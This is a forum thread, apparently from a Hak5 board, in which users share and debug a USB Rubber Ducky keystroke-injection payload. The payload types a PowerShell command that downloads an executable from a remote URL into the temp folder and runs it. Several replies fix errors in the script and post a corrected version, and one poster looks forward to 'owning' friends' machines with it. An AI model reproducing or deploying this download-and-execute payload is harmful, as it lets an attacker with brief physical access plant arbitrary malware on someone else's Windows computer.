mubix Posted December 31, 2011 Share Posted December 31, 2011 I recently added a Ducky payload to the page http://www.usbrubber...ll_wget_execute : Interested in what you guys think. GUI r DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe" ENTER Quote Link to comment Share on other sites More sharing options...
HoodooTheGreat Posted November 2, 2012 Share Posted November 2, 2012 Sweet this is what ive been looking for!!!! Download and Execute is where its at fo sure, Havent tried it yet to see if it works or not, Hopefully it does., Quote Link to comment Share on other sites More sharing options...
PineDominator Posted November 3, 2012 Share Posted November 3, 2012 Sweet this is what ive been looking for!!!! Download and Execute is where its at fo sure, Havent tried it yet to see if it works or not, Hopefully it does., Check out http://usbrubberducky.com Quote Link to comment Share on other sites More sharing options...
HoodooTheGreat Posted November 3, 2012 Share Posted November 3, 2012 Check out http://usbrubberducky.com Hey thank you very much!!! Cant wait to own some buddy's...hehe Quote Link to comment Share on other sites More sharing options...
HoodooTheGreat Posted November 3, 2012 Share Posted November 3, 2012 I get this error when the ducky does its thing. "Windows cannot find '#powershell'. Make sure you typed the name correctly, and then try again. " Any suggestions? Also, For the "Local filename " it should look like this right? [/img] Quote Link to comment Share on other sites More sharing options...
PineDominator Posted November 3, 2012 Share Posted November 3, 2012 (edited) I get this error when the ducky does its thing. "Windows cannot find '#powershell'. Make sure you typed the name correctly, and then try again. " Any suggestions? Also, For the "Local filename " it should look like this right? [/img] what version of windows? if below 7 then you have to install powershell Edited November 3, 2012 by petertfm Quote Link to comment Share on other sites More sharing options...
HoodooTheGreat Posted November 3, 2012 Share Posted November 3, 2012 (edited) what version of windows? if below 7 then you have to install powershell Windows 7 Ultimate, I can launch Powershell and everything seems to be working. Could it be how I created my payload using the generate payload button. See Photobucket link to varify everything looks how it should. For local file name it should be the name of the file correct. Example- "myfile.exe" Edited November 3, 2012 by HoodooTheGreat Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 4, 2012 Share Posted November 4, 2012 This power shell download seems to work a lot better than the VBS version did. I have had a lot more luck downloading from sites that didn't support whatever protocol the VBS script did. Quote Link to comment Share on other sites More sharing options...
denied39 Posted November 16, 2012 Share Posted November 16, 2012 Ok, I must be doing something wrong with this payload. Everytime I try to run the payload, I get the following: C:\Users\xxxx>powershell -noprofile -noninteractive -command "& {$client=new-object system.net.webclient;$client.downloadfile("http://x.x.x.x/26. txt", "$env:temp\_shella.txt")}" Missing ')' in method call. At line:1 char:65 + & {$client=new-object system.net.webclient;$client.downloadfile( <<<< http://x.x.x.x/26.txt, $env:temp\_shella.txt)} + CategoryInfo : ParserError: (CloseParenToken:TokenId) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : MissingEndParenthesisInMethodCall I can't even get it to run right from the command line. I can get it to run if I break it up. If I run powershell first, then execute the new-object downloadfile portion, the file downloads fine. I'm running this on Windows 7 Enterprise. Any ideas? Quote Link to comment Share on other sites More sharing options...
Neworld Posted December 10, 2012 Share Posted December 10, 2012 (edited) Ok, I must be doing something wrong with this payload. Everytime I try to run the payload, I get the following: C:\Users\xxxx>powershell -noprofile -noninteractive -command "& {$client=new-object system.net.webclient;$client.downloadfile("http://x.x.x.x/26. txt", "$env:temp\_shella.txt")}" Missing ')' in method call. At line:1 char:65 + & {$client=new-object system.net.webclient;$client.downloadfile( <<<< http://x.x.x.x/26.txt, $env:temp\_shella.txt)} + CategoryInfo : ParserError: (CloseParenToken:TokenId) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : MissingEndParenthesisInMethodCall I can't even get it to run right from the command line. I can get it to run if I break it up. If I run powershell first, then execute the new-object downloadfile portion, the file downloads fine. I'm running this on Windows 7 Enterprise. Any ideas? This is because when you go into run, they only allow a certain number of characters... You can fix this by just saying "enter" after you type power shell in... DELAY 2000GUI rDELAY 100STRING powershellENTERSTRING (new-object System.Net.WebClient).DownloadFile('Executable URL','%TEMP%\Local Filename'); Start-Process "%TEMP%\Local Filename"ENTER[/CODE] Edited December 10, 2012 by Neworld Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.